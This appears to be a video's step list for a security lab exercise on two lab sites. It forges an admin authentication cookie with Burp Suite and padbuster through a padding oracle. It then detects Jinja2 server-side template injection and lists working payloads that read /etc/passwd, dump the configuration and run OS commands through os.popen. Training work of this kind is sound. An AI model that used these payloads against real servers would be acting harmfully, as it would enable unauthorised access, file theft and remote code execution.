Скачать или смотреть Project 50 - Padding Oracle and Server-Side Template Injection Attacks

Steps Taken (in the order that they appear in the video):

1. Open a web browser, go to padding-oracle.com:5001 and click the Register option

2. Start Burpsuite

3. Go to Preferences in Firefox, scroll down to Network Settings, Choose Manual Proxy and set it to 127.0.0.1 8080

4. Back in the Burpsuite, turn the Interceptor on under the Proxy tab

5. Back in the webpage, set the username to student and password to computer

6. ^ We can see that Burpsuite is working, notice the plaintext credentials that I just entered on the webpage

7. Forward the request and now we can see an authentication key. Then right click it to send it to the repeater

8. Send the request. The Response is showing the markup language for the website meaning that I've successfully logged in as student

9. Open a terminal window and padbuster http://padding-oracle.com:5001/login.php 'auth' 8 --cookies auth='auth' encoding 0 (in this scenario we know up front the block size of the cipher is set to 8, and the sample is base64 encoded).

10. ^We're going to replace where it says 'auth' in the command line with the mJoimu4yyZqKac46qSHpjSOCWGKTYnD0 authentication cookie (get rid of single quotes)

11. Type 2

12. PadBuster shows the decrypted values of the authentication cookie in base64, HEX, and ASCII formats.

13. padbuster http://padding-oracle.com:5001/login.php 'auth' 8 --cookies auth='auth' encoding 0 -plaintext user=admin (to add the username admin to the command. This will encrypt the authentication key as admin)

14. Type 2

15. Now we can see the encrypted value of the modified authentication cookie

16. Copy the new authentication cookie, paste over the original one in the Burpsuite request within the Interceptor, and click Forward

17. Check back at the webpage and now see that we are logged in as admin

18. Turn off Interceptor in Burpsuite

19. Go to template-injection.com:5000 in the web browser and login (admin, admin)

20. To properly execute this attack we must detect the vulnerability, identify what template is being used, exploit the vulnerability

21. Detect: ${7*7} and submit (to detect whether the application vulnerable to SSTI).

22. This doesn't get executed in the server, so lets try {{7*7}}.

23. We can see that the web server is vulnerable to the attack because it computed the equations and gave us a return value of 49.

24. Identify: There are two options, first is to submit payloads that may cause server errors, and the server will print those errors. The second option is to manually submit different programming language payloads and study how the template engine interprets them. If I entered {{7*'7'}} (adding single quotes around the second 7) that would tell me the server is using a Twig template. However, if the output return with 7777777 then we would know that the Jinja2 template engine is being used. Having a strong knowledge of the format template engines print output in definitely helps!

25. {{7*'7'}} (to see what it returns) The server is using the Jinja2 template engine

26. Exploit: {{config.items()}} (to show the content of the configuration object, which is a dictionary-like object containing all of the application's configuration values).

27. {{ get_flashed_messages.__globals__ }} (to access cached information in the server).

28. {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} (to see the contents of the /etc/passwd file)

29. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} (allows us to see account information)

30. {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} (allows us to see the content of the current working directory)